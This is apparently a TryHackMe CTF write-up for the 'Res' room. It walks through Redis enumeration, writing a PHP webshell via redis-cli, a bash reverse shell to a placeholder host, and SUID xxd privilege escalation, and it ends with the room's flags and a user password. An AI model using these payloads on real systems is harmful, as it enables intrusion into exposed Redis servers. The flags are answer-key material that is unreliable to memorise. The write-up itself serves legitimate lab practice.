TRYHACKME’s RES CTF WRITEUP-step-wise-step
Hello hackers!
welcome to another ctf writeup. Today we are going to complete tryhackme’s Res ctf room. so, without any further a due let’s dive in.
First thing first let’s start with enumeration using our one and only nmap.
here we see only 2 ports open after a full port scan. And that is our first question’s answer to how many ports are open: 2
we all know what http and port 80 are for but redis and port 6379 are new so what do we do? that’s right everyone we google it and found out following details:
so basically it’s a DBMS with some specific features and characteristics.
and that’s how we got our second and third question’s answer to DBMS installed on: redis and also port no. 6379.
if we look at our nmap scan we can see at redis there we saw a version no 6.0.7 which is our foruth question’s answer.
now if we look at our enumeration we have a service running named redis at port no. 6379 which version is 6.0.7 and we also have a http service running at port 80. On port 80 we see a default apache2 homepage we can run gobuster and find out possible web directories. let’s do it.
Now we have only one option left which is to search an redis 6.0.7.
after some research i found out we can connect to redis clients. using redis tool and we have to install those tools using followin command:
sudo apt-get install redis-tools
now we can connect to redis host using following commands:
redis-cli -h <targetIP>
we can connect to redis clients using username and pass but our host is not configured that way we can see that using info commad. pressing info command we can see a possible user on our traget machine named vianka.
we can add our RCE in this database and use it through http service. Inorder to that we have to find out web directory on target machine with our nmap Os detection we see it’s using linux so we can assume web directory can be /var/www/html now let’s add our rce there:
Above we can see that our RCE has been successful now time to use reverse shell. we can add our reverse shell as same way above:
“<?php exec(\”/bin/bash -c ‘bash -i > /dev/tcp/YOUR_IP/PORT 0>&1’\”); ?>”
use above reverse php shell by changing your ip and desired port. start netcat listener and goto the web and execute your reverse shell.
Now play around and searrch for flags. we find our first flag at /home/vianka. now we try to escalate our privilege.
we try to find any suid set files using find command:
find / -type f -perm -u=s 2>/dev/null
we found a lot of suid set results and after trying many i found /usr/bin/xxd and use this to escalate your privilege https://gtfobins.github.io/gtfobins/xxd/#suid .
user.txt: thm{red1s_rce_w1thout_credent1als}
local user pass: beautiful1
root.txt: thm{xxd_pr1v_escalat1on}
Congratulations! we have completed tryhackme’s Res ctf together. This ctf was really helpful to learn about new services,how to research about them,how to communictae with them and use it gain foothold. Thank you tryhackme, room creators and awesome hackers who are reading this. And remember it’s totally okay to see writeups if you are stuck none knows everything. it’s okay to rely on someone and something. With that saying thank you again for reading this and comment how’s my writeup. keep hacking!
